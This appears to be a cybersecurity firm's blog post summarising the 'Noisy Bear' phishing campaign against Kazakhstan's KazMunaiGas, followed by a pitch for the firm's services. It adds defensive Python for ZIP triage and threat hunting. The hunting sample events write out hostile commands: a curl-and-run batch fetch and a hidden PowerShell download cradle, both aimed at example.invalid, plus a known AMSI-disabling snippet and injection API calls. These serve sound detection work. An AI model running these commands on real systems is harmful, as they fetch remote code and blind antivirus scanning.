A newly identified advanced persistent threat group, dubbed Noisy Bear, has launched a wave of cyberattacks against Kazakhstan’s energy sector, with a particular focus on KazMunaiGas (KMG), the nation’s leading oil and gas company. Researchers at Seqrite Labs have been tracking the group’s activity since April 2025 and attribute the campaign to actors possibly of Russian origin.
The campaign, known as Operation BarrelFire, leverages spear-phishing tactics to infiltrate corporate networks. In May 2025, attackers used a compromised business email belonging to a finance department employee at KMG to deliver malicious files disguised as urgent internal HR communications. The phishing email, marked “URGENT! Review the updated salary schedule,” contained a ZIP attachment named График.zip (Schedule.zip). Inside were three files:
- A decoy document bearing KMG’s official logo, written in Russian and Kazakh, instructing employees to run a program named KazMunayGaz_Viewer
- A README.txt repeating the same instructions
- A malicious LNK shortcut file named График зарплат.lnk (Salary Schedule.lnk)
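A gateway-side check for this kind of lure, as an added example (not tooling from Seqrite Labs, KMG or the consultancy): it builds a ZIP in memory with the same three-file layout as the lure above and flags the shortcut both by its .lnk extension and by the LNK file header, so a shortcut renamed to look like a document is still caught. The decoy and README contents are placeholders, and the shortcut entry is a bare LNK header rather than a working lure.

```python
"""Triage a ZIP attachment for hidden Windows shortcuts without extracting it to disk.

Added example: not code from the Seqrite Labs report or from KMG. The archive it
scans is built in memory below and mimics the three-file layout described above;
the shortcut entry is a bare LNK header, not a working lure.
"""
import io
import zipfile

# Every Windows shortcut starts with HeaderSize 0x0000004C followed by the LNK
# CLSID 00021401-0000-0000-C000-000000000046 in little-endian byte order, so a
# shortcut can be recognised even when its .lnk extension has been changed.
LNK_MAGIC = bytes.fromhex("4c000000" "0114020000000000c000000000000046")

# Extensions that Windows executes directly on double-click.
EXECUTABLE_SUFFIXES = (".lnk", ".bat", ".cmd", ".ps1", ".vbs", ".js", ".jse",
                       ".wsf", ".hta", ".exe", ".scr", ".pif")
DOCUMENT_SUFFIXES = {"pdf", "doc", "docx", "xls", "xlsx", "txt", "rtf"}


def is_lnk(head: bytes) -> bool:
    """True if the first bytes of a file carry the LNK header."""
    return head[:len(LNK_MAGIC)] == LNK_MAGIC


def triage_archive(blob: bytes) -> list:
    """Return one finding per suspicious entry: {'name': ..., 'reasons': [...]}."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(blob)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            with zf.open(info) as fh:
                head = fh.read(len(LNK_MAGIC))   # only the header is needed
            lower = info.filename.lower()
            reasons = []
            if is_lnk(head):
                reasons.append("LNK header")            # content-based, survives renaming
            if lower.endswith(EXECUTABLE_SUFFIXES):
                reasons.append("executable extension")
            parts = lower.rsplit(".", 2)                # schedule.pdf.lnk -> [schedule, pdf, lnk]
            if len(parts) == 3 and parts[1] in DOCUMENT_SUFFIXES:
                reasons.append("double extension")
            if reasons:
                findings.append({"name": info.filename, "reasons": reasons})
    return findings


def should_block(blob: bytes) -> bool:
    """Policy: any LNK or directly executable entry is enough to quarantine the mail."""
    return bool(triage_archive(blob))


def build_archive(entries: dict) -> bytes:
    """Build a ZIP in memory from {filename: bytes}; used to construct samples."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, data in entries.items():
            zf.writestr(name, data)
    return buf.getvalue()


def build_sample_archive() -> bytes:
    """Constructed sample mirroring the layout above (contents are placeholders)."""
    return build_archive({
        "Salary schedule (decoy).pdf": b"%PDF-1.4 placeholder decoy document",
        "README.txt": "Run KazMunayGaz_Viewer to open the schedule.".encode("utf-8"),
        "График зарплат.lnk": LNK_MAGIC + b"\x00" * 60,
    })


if __name__ == "__main__":
    for f in triage_archive(build_sample_archive()):
        print(f["name"], "->", ", ".join(f["reasons"]))
```

Checking the header rather than the extension is the part that matters: a mail filter that only blocks `*.lnk` is defeated by renaming the shortcut inside the archive, while the 20-byte LNK header is what Windows itself keys on and is not something the attacker can drop.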
When executed, the shortcut triggered a multi-stage infection chain:
- Stage 0 – LNK and batch scripts: the shortcut fetched batch scripts (123.bat and it.bat) from a remote server. These scripts ran the next stage while blending into ordinary command-line activity.
- Stage 1 – PowerShell loaders (DOWNSHELL): the batch scripts fetched PowerShell-based loaders dubbed DOWNSHELL. The loaders bypassed AMSI (the Antimalware Scan Interface) so that their script content was never handed to the installed antivirus for scanning, then loaded shellcode into the memory of legitimate processes.
- Stage 2 – DLL implant: finally, the attackers deployed a 64-bit DLL implant capable of spawning a reverse shell via thread hijacking. This gave Noisy Bear persistent access to the host and a channel through which to exfiltrate sensitive corporate data.
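Hunting logic for the chain above, as an added example (not code from the Seqrite Labs report or from the consultancy's own tooling). It runs a handful of rules over constructed process-creation and PowerShell script-block events and escalates a host once two or more distinct stages are seen within a time window. The hostnames, the domain example.invalid and the file name stage1.ps1 are made up; only the 123.bat name is taken from the text. In production the events would come from Sysmon (Event ID 1 and PowerShell 4104) or EDR telemetry rather than an inline list.

```python
"""Hunting rules for the LNK -> batch -> PowerShell -> in-memory loader chain.

Added example: not code from the Seqrite Labs report or the consultancy's own
tooling. The events below are constructed (hostnames, example.invalid and
stage1.ps1 are made up; only the 123.bat name comes from the text above).
"""
import re
from collections import defaultdict

SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# Tokens that pull a payload from a remote server (stage 0 and stage 1 behaviour).
DOWNLOAD_RE = re.compile(r"https?://|downloadstring|downloadfile|invoke-webrequest|\biwr\b|"
                         r"\bcurl\b|bitsadmin|certutil\s+-urlcache", re.I)
# PowerShell switches that hide the window, skip the profile, bypass policy or carry an encoded command.
STEALTH_RE = re.compile(r"-w(indowstyle)?\s+hidden|-nop(rofile)?\b|-e(xecutionpolicy|p)\s+bypass|"
                        r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I)
# Strings found in the common AMSI-tampering snippets; obfuscated bypasses need script-block logging too.
AMSI_RE = re.compile(r"amsiutils|amsiinitfailed|amsiscanbuffer|amsi\.dll", re.I)
# Win32 APIs used by in-memory shellcode loaders and thread hijacking.
INJECT_RE = re.compile(r"virtualalloc|createremotethread|queueuserapc|setthreadcontext|"
                       r"suspendthread|ntmapviewofsection", re.I)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def evaluate(ev: dict) -> list:
    """Return the rule names a single event triggers."""
    hits = []
    if ev["type"] == "process":
        parent, image, cmd = basename(ev["parent"]), basename(ev["image"]), ev["cmdline"]
        if parent == "explorer.exe" and image in SCRIPT_HOSTS and DOWNLOAD_RE.search(cmd):
            hits.append("stage0_lnk_download")       # shortcut launched a script host that fetches a file
        if parent == "cmd.exe" and image in {"powershell.exe", "pwsh.exe"} and STEALTH_RE.search(cmd):
            hits.append("stage1_hidden_powershell")  # batch file spawning stealthy PowerShell
        if AMSI_RE.search(cmd):
            hits.append("amsi_tamper")
    elif ev["type"] == "scriptblock":
        if AMSI_RE.search(ev["text"]):
            hits.append("amsi_tamper")
        if INJECT_RE.search(ev["text"]):
            hits.append("in_memory_loader")
    return hits


def correlate(events: list, window: int = 600) -> dict:
    """Per host, find the largest set of distinct stages seen inside `window` seconds."""
    by_host = defaultdict(list)
    for ev in events:
        for name in evaluate(ev):
            by_host[ev["host"]].append((ev["ts"], name))
    alerts = {}
    for host, hits in by_host.items():
        hits.sort()
        best = set()
        for i, (t0, _) in enumerate(hits):
            group = {name for t, name in hits[i:] if t - t0 <= window}
            if len(group) > len(best):
                best = group
        alerts[host] = {"severity": "high" if len(best) >= 2 else "low", "stages": sorted(best)}
    return alerts


SAMPLE_EVENTS = [  # constructed, not real telemetry
    {"type": "process", "host": "ws-fin-07", "ts": 0,
     "parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c curl -s http://example.invalid/123.bat -o %TEMP%\123.bat && %TEMP%\123.bat"},
    {"type": "process", "host": "ws-fin-07", "ts": 4,
     "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -ep bypass -c \"IEX (New-Object Net.WebClient)"
                ".DownloadString('http://example.invalid/stage1.ps1')\""},
    {"type": "scriptblock", "host": "ws-fin-07", "ts": 9,
     "text": "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')"
             ".GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)"},
    {"type": "scriptblock", "host": "ws-fin-07", "ts": 12,
     "text": "$buf = [Win32]::VirtualAlloc(0, $sc.Length, 0x3000, 0x40); "
             "[Win32]::SetThreadContext($hThread, $ctx)"},
    {"type": "process", "host": "ws-it-02", "ts": 30,   # benign admin activity, should not fire
     "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -Command Get-Service -Name Spooler"},
]

if __name__ == "__main__":
    for host, alert in correlate(SAMPLE_EVENTS).items():
        print(host, alert["severity"], alert["stages"])
```

Any single rule here is noisy on its own (administrators do run hidden PowerShell from batch files), which is why the escalation key is the number of distinct stages on one host inside the window rather than any one hit. The AMSI and injection rules depend on script-block logging being enabled; without it, the loader stage is invisible to process-creation telemetry.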
The campaign’s infrastructure was traced to domains and servers hosted under Aeza Group LLC, a sanctioned Russian hosting provider. The use of Russian-language comments in the malware, operational overlaps with previous campaigns, and reliance on open-source penetration testing tools such as Metasploit and PowerSploit further support attribution to a Russian threat actor.
How Our Cybersecurity Services Could Help
Such targeted campaigns highlight the increasing sophistication of cyber adversaries. Our consultancy provides a comprehensive defense strategy across the full cyber kill chain:
- IT & Cybersecurity Consultancy – Tailored strategies to strengthen enterprise resilience against spear-phishing and advanced persistent threats.
- Password Security and Personal Data Security – Protection against account compromise, ensuring employee credentials are hardened against brute force and phishing attacks.
- Social Media Security – Monitoring for impersonation and fraudulent accounts that can be exploited for reconnaissance or social engineering.
- Incident Response & Recovery – Rapid containment, eradication, and system recovery following intrusions such as Noisy Bear’s DLL implant infections.
- Security Audits & Vulnerability Assessments – Identifying misconfigurations and weaknesses before adversaries exploit them.
- Penetration Testing – Simulating real-world APT attacks to evaluate defenses against threats like phishing chains and DLL injection.
- Compliance & Regulatory Services – Assisting firms in energy and critical infrastructure to meet national and international cybersecurity standards.
- Managed Security Services (MSS) – Continuous monitoring of logs, endpoints, and network traffic to detect anomalies before they escalate.
- Cyber Protection Academy – Training employees to recognize and report phishing attempts, the very vector exploited by Noisy Bear.
- Cybersecurity Recruitment Services – Building skilled security teams equipped to defend high-value sectors such as oil and gas.
The Noisy Bear operation demonstrates how modern threat actors exploit trust within organizations, using legitimate-looking internal communications to trigger multi-stage malware delivery. For companies operating in critical industries like energy, the stakes are higher than ever. Proactive defense, employee training, and continuous monitoring are no longer optional; they are essential.
References
- Seqrite Labs (2025). Noisy Bear APT campaign targeting Kazakhstan’s energy sector.
- The Hacker News (2025). Russian-linked Noisy Bear targets KazMunaiGas employees with phishing campaign.
- MITRE ATT&CK Framework – T1204 (User Execution), T1059 (Command and Scripting Interpreter), T1562 (Impair Defenses), T1105 (Ingress Tool Transfer).